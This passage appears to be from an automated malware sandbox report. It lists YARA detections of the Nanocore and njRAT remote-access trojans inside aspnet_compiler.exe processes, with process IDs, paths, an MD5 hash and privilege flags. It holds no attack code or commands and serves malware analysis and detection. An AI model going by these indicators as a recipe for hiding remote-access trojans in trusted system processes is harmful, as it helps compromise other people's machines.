                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            Reputation:moderate

                                                                            Analysis Process: aspnet_compiler.exe PID: 6664 Parent PID: 6756

                                                                            General

                                                                            Start time:20:42:58
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x130000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Analysis Process: aspnet_compiler.exe PID: 5596 Parent PID: 6756

                                                                            General

                                                                            Start time:20:42:59
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0xa10000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: Njrat, Description: detect njRAT in memory, Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >